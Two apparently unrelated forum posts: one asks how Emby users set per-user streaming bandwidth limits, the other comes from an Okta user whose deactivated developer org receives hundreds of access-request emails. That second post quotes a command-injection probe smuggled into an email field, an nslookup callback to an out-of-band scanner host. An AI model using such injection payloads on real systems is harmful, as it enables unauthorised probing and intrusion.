Do you set bandwidth limits for each user?

I've been slowly making the transition from Plex over the last year, and I'm at the point where I'm ready to tell my small handful of users to download the Emby app and switch over.

One thing I've noticed in Emby is if a user attempts to play a file which is higher bitrate than their connection allows, the app just kicks them back to the menu without any information about what went wrong. The solution is to adjust the maximum quality setting downward until the bitrate fits within their bandwidth. I ran into this getting my girlfriend's Roku set up on our home network.

Now I'm curious - do you set a maximum streaming quality per user based on what you know about their connection quality? I have a number of high bitrate files I'd like people to be able to watch (either direct stream, or more likely transcoded) but I'm used to Plex handling the streaming quality to match the connection, and Emby doesn't seem to do that.

Hundreds of emails from deactivated org

I had an Okta developer org which was deactivated when they switched to integrator. According to their documentation, if I did not wish to preserve any of the configurations, I did not need to do anything.

I can no longer access the org since it was deactivated. I don't need it, and I thought it was gone.

Yesterday, I started receiving hundreds of emails indicating a malicious user is attempting string injection:

[Okta site] Application access request
&(nslookup -q=cname hitdgfrslyavy05c75.bxss.me
–testing@example.com
Organization associated with domain:*my old deactivated org*User logged in:(no user)Client IP address:109.123.237.109Provided address: *testing@example.comUser associated with provided address: *
* Note: Okta cannot ensure the legitimacy of the provided email address because it was entered by the user.

This is just one such example, but there are hundreds.

How is anyone able to attempt to access my application if it's been deactivated and I can't even log into it?

What is at risk here?

I can no longer create an Okta account, since my previous account was for personal development use, and they no longer allow non-business emails to sign up. So I can't access my deactivated org, and I can't sign up for an Okta account to ask Okta why this is happening, but someone is able to attempt to access my old deactivated org, somehow.
